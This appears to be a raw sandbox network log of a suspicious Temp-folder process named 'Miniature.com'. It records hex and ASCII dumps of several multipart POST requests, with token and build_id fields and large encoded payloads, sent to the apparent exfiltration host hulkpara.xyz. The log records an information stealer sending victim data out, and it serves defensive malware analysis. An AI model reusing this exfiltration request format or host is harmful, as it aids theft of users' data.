                                                                                                                                                                                                                                                                                          2024-12-19 07:13:36 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                          Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:36 UTC760INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                          Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:37 UTC719INData Raw: 32 63 38 0d 0a 4f 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 31 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 42 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 43 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 34 64 20 67 62 5f 44 63 20 67 62 5f 37 64 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 2f 3f 74 61 62 5c 75 30 30 33 64 72 72 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4e 64 20 67
                                                                                                                                                                                                                                                                                          Data Ascii: 2c8Oc\"\u003e\u003cdiv class\u003d\"gb_1c\"\u003e\u003cdiv class\u003d\"gb_Bc\"\u003e\u003cdiv class\u003d\"gb_Cc\"\u003e\u003ca class\u003d\"gb_4d gb_Dc gb_7d\" aria-label\u003d\"Google\" href\u003d\"/?tab\u003drr\"\u003e\u003cspan class\u003d\"gb_Nd g
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:37 UTC1390INData Raw: 38 30 30 30 0d 0a 31 37 31 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e
                                                                                                                                                                                                                                                                                          Data Ascii: 8000171,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instan
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:37 UTC1390INData Raw: 65 74 75 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 49 64 28 5c 22 61 62 6f 75 74 3a
                                                                                                                                                                                                                                                                                          Data Ascii: eturn[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Jd\u003dnew _.Id(\"about:
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:37 UTC1390INData Raw: 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30
                                                                                                                                                                                                                                                                                          Data Ascii: };_.Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u00
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:37 UTC1390INData Raw: 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63
                                                                                                                                                                                                                                                                                          Data Ascii: ectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49736 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com

Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:40 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----NYC2NGV37YCBIM7Y5XBI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Content-Length: 505
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 07:13:40 UTC | 505 | OUT | Data Ascii:
------NYC2NGV37YCBIM7Y5XBI
Content-Disposition: form-data; name="token"

cf24ca26af1dc229937e6396f212b71d
------NYC2NGV37YCBIM7Y5XBI
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------NYC2NGV37YCBIM7Y5XBI
Cont
2024-12-19 07:13:41 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 07:13:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-19 07:13:41 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 49737 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com

Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:41 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----26XB16PZUA1VAASJ5PHV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Content-Length: 213453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 07:13:41 UTC | 16355 | OUT | Data Ascii:
------26XB16PZUA1VAASJ5PHV
Content-Disposition: form-data; name="token"

cf24ca26af1dc229937e6396f212b71d
------26XB16PZUA1VAASJ5PHV
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------26XB16PZUA1VAASJ5PHV
Cont
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-19 07:13:43 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 07:13:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
12          192.168.2.7  49739        94.130.191.168  443               7416  C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp                Bytes transferred  Direction  Data
2024-12-19 07:13:43 UTC  326                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----5FCJE3OH47GV37Q9R1VS
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Data Ascii: ------5FCJE3OH47GV37Q9R1VSContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------5FCJE3OH47GV37Q9R1VSContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------5FCJE3OH47GV37Q9R1VSCont
2024-12-19 07:13:45 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 07:13:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-19 07:13:45 UTC  12                 IN         Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
13          192.168.2.7  49740        94.130.191.168  443               7416  C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp                Bytes transferred  Direction  Data
2024-12-19 07:13:45 UTC  327                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----USR1N7QIEU37YUAS2V3W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Data Ascii: ------USR1N7QIEU37YUAS2V3WContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------USR1N7QIEU37YUAS2V3WContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------USR1N7QIEU37YUAS2V3WCont
                                                                                                                                                                                                                                                                                          Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
